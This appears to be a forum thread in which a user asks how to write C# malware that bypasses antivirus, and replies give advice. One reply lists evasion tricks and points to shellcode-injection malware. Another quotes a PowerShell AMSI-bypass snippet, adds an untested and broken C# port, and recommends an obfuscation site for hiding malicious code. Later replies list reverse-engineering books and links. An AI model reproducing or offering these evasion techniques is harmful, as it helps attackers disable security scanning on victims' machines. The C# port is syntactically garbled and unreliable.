Hello every I am learning C#. because I want to bypass Anti-Viruses by C#.But I don’t know how to learn this knowledge about bypass Anti-Viruses by C#.
Hey!!
Well I’d recommend you first understand the AV’s then learn some basic C#. One of the thing about evading AV is understanding what is being detected.
You don’t need to write in C but this is a good read on understand why the methods work
The following Link has references and ideas on how to execute Shell-code on your C# malware
This is a simple C# malware that injects and executes shellcode
If you can look onto other researchers on the different methods they execute their malware you can grab an idea on how to write your own. For evading is usually stuff as changing variables names, removing comments, different methods of execution, size, flow of execution, obfuscation. You can use these terms to research methods of evading AV as these are used in different places (Go, PowerShell, C, F#, etc)
Good Luck!
Hey @pryoc110. It should be noted that the C# programming language may not be the best for developing malware to evade antivirus. Microsoft recently integrated their anti-malware scan interface with the .NET framework (Ashcraft, 2019), so in my non-expert opinion, only use C# AV avoidance techniques if you’re up for a good challenge — especially if you’re going to use the assembly in a real life situation!
But if you really want to try to evade antivirus with a .NET assembly written in C#, I was able to find a few interesting projects and research that might be able to help you. Chandel (2022) discusses seven different techniques for bypassing the AMSI service. They’re mostly applied to PowerShell, but I do think that with a bit of creativity, you can implement them in C#.
For example, consider this snippet in Chandel’s article:
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)
This is referencing a function called amsiInitFailed()
and trying to set it to true
as to “tricking,” for lack of a better term, the interface into not scanning the assembly in question. Here is a simple PowerShell-to-C# pseudo-port that I whipped up (that I didn’t bother to test, I’ll leave that up to you ;-):
using System;
using System.Runtime.InteropServices;
public class Programme {
public static void Main(string[] args) {
var mem = System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);
Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue(null, null);
Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue(null, (IntPtr)mem)
}
}
There are also websites like amsi.fail that take in (specifically PowerShell) code, and obfuscates and mangles them to the point that AMSI will get too confused and not recognise the malicious nature of the thing. I do recommend using these as a starting point for getting your C# malware up and going
That’s awesome! I’m going to learn these great projects and knowledge.
Hi dude,I took your advice and went to learn some reverse knowledge, such as PE structure, assembly code, C and C++
Awww thanks
I am no expert, but here are some resources for you:
Books
- C++ Crash Course: A Fast-Paced Introduction (Lospinoso 2019)
- The Secret Life of Programs (Steinhart 2019)
- Practical Binary Analysis (Andriesse 2018)
- Practical Reverse Engineering (Dang et al 2014)
- Ghidra Software Reverse Engineering for Beginners (David 2021)
Online Resources
- Malware Unicorn’s online resources: https://malwareunicorn.org/#/resources
- and of course Malware Unicorn’s workshops/labs: https://malwareunicorn.org/#/workshops
- There’s Hasherezade’s blog post to get you up to speed on learning malware analysis (and hence more about native PE executables): https://hshrzd.wordpress.com/how-to-start/
- Here is a YouTube course on reverse engineering: https://www.youtube.com/watch?v=fv9ii3W5htQ&list=PLHJns8WZXCdvaD7-xR7e5FJNW_6H9w-wC
- There’s VX Underground, which is just an amazing resource: https://www.vx-underground.org/
- Finally, and this is bit self-promoting, but here is VX Reloaded, which is my personal project in writing malware for fun, not profit. I just have a simple Python file infector, but plan to add more stuff in the future! https://vxreloaded.github.io/
P.S. sorry for the l8 response
Thx friend.I will seriously study these resources you recommend.